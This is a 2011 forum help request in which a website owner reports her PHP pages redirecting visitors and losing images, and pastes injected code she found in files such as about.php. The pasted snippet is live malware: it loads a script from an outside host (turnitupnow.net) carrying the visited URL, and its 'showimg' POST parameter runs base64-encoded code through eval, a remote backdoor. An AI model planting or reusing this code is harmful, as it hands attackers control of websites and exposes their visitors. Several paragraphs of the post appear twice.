Post by Robyn on Nov 26, 2011 12:37:13 GMT -8
So I was simply editing my about page which is .php. I was on my host's file manager. Edited a single number on a font tag, refreshed my website and suddenly all of my images were gone.
Also, when I try to click on the 'images' and load up other pages, it redirects to google.
Anyone else having problems? Try clicking on different pages and refreshing. I've tried on each browser and it is doing the same thing.
robertcity.com
I found that some strange code has been added to some of my links like about.php or myvideos.php...
Please note that I added the header.php thing... I didn't add the above.
Also I posted on facebook and everyone says that my website redirects to google...
Also interesting is my blog which is on wordpress but uses the direct url of my images...
blog.robertcity.com
At least with me, the images all disappear after they load...
Also, when I try to click on the 'images' and load up other pages, it redirects to google.
Anyone else having problems? Try clicking on different pages and refreshing. I've tried on each browser and it is doing the same thing.
robertcity.com
I found that some strange code has been added to some of my links like about.php or myvideos.php...
<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
require_once "./header.php"
?>
Please note that I added the header.php thing... I didn't add the above.
Also I posted on facebook and everyone says that my website redirects to google...
Also interesting is my blog which is on wordpress but uses the direct url of my images...
blog.robertcity.com
At least with me, the images all disappear after they load...